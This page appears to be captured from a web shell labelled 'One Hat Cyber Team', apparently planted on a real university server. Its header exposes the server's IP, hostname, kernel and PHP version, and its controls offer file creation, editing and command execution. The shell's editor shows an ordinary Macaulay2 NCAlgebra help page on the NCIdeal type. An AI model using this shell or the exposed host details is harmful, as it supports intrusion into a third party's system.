One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
Macaulay2
/
NCAlgebra
/
html
/
Edit File:
___N__C__Ideal.html
<!DOCTYPE html> <html lang="en"> <head> <title>NCIdeal -- Type of a two-sided ideal in a noncommutative ring</title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <link type="text/css" rel="stylesheet" href="../../../../Macaulay2/Style/doc.css"> <link rel="stylesheet" href="../../../../Macaulay2/Style/katex/katex.min.css"> <script defer="defer" src="../../../../Macaulay2/Style/katex/katex.min.js"></script> <script defer="defer" src="../../../../Macaulay2/Style/katex/contrib/auto-render.min.js"></script> <script> var macros = { "\\break": "\\\\", "\\ZZ": "\\mathbb{Z}", "\\NN": "\\mathbb{N}", "\\QQ": "\\mathbb{Q}", "\\RR": "\\mathbb{R}", "\\CC": "\\mathbb{C}", "\\PP": "\\mathbb{P}" }, delimiters = [ { left: "$$", right: "$$", display: true}, { left: "\\[", right: "\\]", display: true}, { left: "$", right: "$", display: false}, { left: "\\(", right: "\\)", display: false} ], ignoredTags = [ "kbd", "var", "samp", "script", "noscript", "style", "textarea", "pre", "code", "option" ]; document.addEventListener("DOMContentLoaded", function() { renderMathInElement(document.body, { delimiters: delimiters, macros: macros, ignoredTags: ignoredTags, trust: true }); }); </script> <style>.katex { font-size: 1em; }</style> <script defer="defer" src="../../../../Macaulay2/Style/katex/contrib/copy-tex.min.js"></script> <script defer="defer" src="../../../../Macaulay2/Style/katex/contrib/render-a11y-string.min.js"></script> <script src="../../../../Macaulay2/Style/prism.js"></script> <script>var current_version = '1.25.06';</script> <script src="../../../../Macaulay2/Style/version-select.js"></script> <link type="image/x-icon" rel="icon" href="../../../../Macaulay2/Style/icon.gif"> </head> <body> <div id="buttons"> <div> <a href="https://macaulay2.com/">Macaulay2</a> <span id="version-select-container"></span> » <a title="Macaulay2 documentation" href="../../Macaulay2Doc/html/index.html">Documentation </a> <br><a href="../../Macaulay2Doc/html/_packages_spprovided_spwith_sp__Macaulay2.html">Packages</a> » <span><a href="index.html">NCAlgebra</a> :: <a title="Type of a two-sided ideal in a noncommutative ring" href="___N__C__Ideal.html">NCIdeal</a></span> </div> <div class="right"> <form method="get" action="https://www.google.com/search"> <input placeholder="Search" type="text" name="q" value=""> <input type="hidden" name="q" value="site:macaulay2.com/doc"> </form> <a href="_nc__Ideal.html">next</a> | <a href="_nc__Groebner__Basis.html">previous</a> | <a href="_nc__Ideal.html">forward</a> | <a href="_nc__Groebner__Basis.html">backward</a> | up | <a href="master.html">index</a> | <a href="toc.html">toc</a> </div> </div> <hr> <div> <h1>NCIdeal -- Type of a two-sided ideal in a noncommutative ring</h1> <div> <h2>Description</h2> <div> <p>This defines a right ideal in a noncommutative ring.</p> </div> </div> <div> <div class="waystouse"> <h2>Functions and methods returning an object of class NCIdeal:</h2> <ul> <li><span><a title="The defining ideal of an NCPolynomialRing" href="_ideal_lp__N__C__Polynomial__Ring_rp.html">ideal(NCPolynomialRing)</a> -- The defining ideal of an NCPolynomialRing</span></li> <li><span><a title="Defining ideal of an NCQuotientRing in its ambient ring" href="_ideal_lp__N__C__Quotient__Ring_rp.html">ideal(NCQuotientRing)</a> -- Defining ideal of an NCQuotientRing in its ambient ring</span></li> </ul> <h2>Methods that use an object of class NCIdeal:</h2> <ul> <li><span><a title="Returns a basis of an NCIdeal in a particular degree." href="_basis_lp__Z__Z_cm__N__C__Ideal_rp.html">basis(ZZ,NCIdeal)</a> -- Returns a basis of an NCIdeal in a particular degree.</span></li> <li><span><a title="Returns the generators of an NCIdeal" href="_generators_lp__N__C__Ideal_rp.html">generators(NCIdeal)</a> -- Returns the generators of an NCIdeal</span></li> <li><span><kbd>homogDual(NCIdeal)</kbd> -- see <span><a title="Computes the dual of a pure homogeneous ideal" href="_homog__Dual.html">homogDual</a> -- Computes the dual of a pure homogeneous ideal</span></span></li> <li><span><a title="Determines whether the input defines a homogeneous object" href="_is__Homogeneous_lp__N__C__Ideal_rp.html">isHomogeneous(NCIdeal)</a> -- Determines whether the input defines a homogeneous object</span></li> <li><span><kbd>ncGroebnerBasis(NCIdeal)</kbd> -- see <span><a title="Compute a noncommutative Groebner basis." href="_nc__Groebner__Basis.html">ncGroebnerBasis</a> -- Compute a noncommutative Groebner basis.</span></span></li> <li><span><a title="Sum of NCIdeals" href="___N__C__Ideal_sp_pl_sp__N__C__Ideal.html">NCIdeal + NCIdeal</a> -- Sum of NCIdeals</span></li> <li><span><a title="Construct a NCQuotientRing" href="___N__C__Polynomial__Ring_sp_sl_sp__N__C__Ideal.html">NCPolynomialRing / NCIdeal</a> -- Construct a NCQuotientRing</span></li> <li><span><a title="Apply a ring map to the generators of an ideal" href="___N__C__Ring__Map_sp__N__C__Ideal.html">NCRingMap NCIdeal</a> -- Apply a ring map to the generators of an ideal</span></li> <li><span><kbd>quadraticClosure(NCIdeal)</kbd> -- see <span><a title="Creates the subideal generated by quadratic elements of a given ideal" href="_quadratic__Closure.html">quadraticClosure</a> -- Creates the subideal generated by quadratic elements of a given ideal</span></span></li> <li><span><a title="Returns the ring of an NCIdeal or NCGroebnerBasis" href="_ring_lp__N__C__Ideal_rp.html">ring(NCIdeal)</a> -- Returns the ring of an NCIdeal or NCGroebnerBasis</span></li> <li><span><kbd>twoSidedNCGroebnerBasisBergman(NCIdeal)</kbd> -- see <span><a title="Calls Bergman to compute a two sided noncommutative Groebner Basis." href="_two__Sided__N__C__Groebner__Basis__Bergman.html">twoSidedNCGroebnerBasisBergman</a> -- Calls Bergman to compute a two sided noncommutative Groebner Basis.</span></span></li> </ul> </div> <div class="waystouse"> <h2>For the programmer</h2> <p>The object <a title="Type of a two-sided ideal in a noncommutative ring" href="___N__C__Ideal.html">NCIdeal</a> is <span>a <a title="the class of all mutable types" href="../../Macaulay2Doc/html/___Type.html">type</a></span>, with ancestor classes <a title="the class of all hash tables" href="../../Macaulay2Doc/html/___Hash__Table.html">HashTable</a> < <a title="the class of all things" href="../../Macaulay2Doc/html/___Thing.html">Thing</a>.</p> </div> <hr> <div class="waystouse"> <p>The source of this document is in <span class="tt">NCAlgebra/NCAlgebraDoc.m2:1952:0</span>.</p> </div> </div> </div> </body> </html>
Simpan